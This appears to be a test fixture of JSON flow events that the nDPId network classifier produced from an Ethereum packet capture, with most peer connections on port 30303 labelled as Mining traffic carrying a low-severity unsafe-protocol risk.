00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1578508364632,"flow_last_seen":1578508364787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":1065,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364682,"flow_last_seen":1578508364899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508364523,"flow_last_seen":1578508364743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365189,"flow_last_seen":1578508365331,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":1435,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":180000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1578508364522,"flow_last_seen":1578508365440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":1274,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1578508364522,"flow_last_seen":1578508365440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":1274,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508362274,"flow_last_seen":1578508363333,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1578508365239,"flow_last_seen":1578508365961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":1758,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508365021,"flow_last_seen":1578508365192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365029,"flow_last_seen":1578508365211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365588,"flow_last_seen":1578508365744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1578508365239,"flow_last_seen":1578508365961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":1758,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508365021,"flow_last_seen":1578508365192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365029,"flow_last_seen":1578508365211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365588,"flow_last_seen":1578508365744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364732,"flow_last_seen":1578508365736,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364523,"flow_last_seen":1578508364723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1218,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508365712,"flow_last_seen":1578508366123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364523,"flow_last_seen":1578508364723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1218,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508365712,"flow_last_seen":1578508366123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365919,"flow_last_seen":1578508365951,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364776,"flow_last_seen":1578508365781,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1578508364382,"flow_last_seen":1578508364651,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365408,"flow_last_seen":1578508365790,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":554,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1578508364523,"flow_last_seen":1578508364687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":1846,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508365194,"flow_last_seen":1578508366069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00764{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508364937,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":470,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508364523,"flow_last_seen":1578508365656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
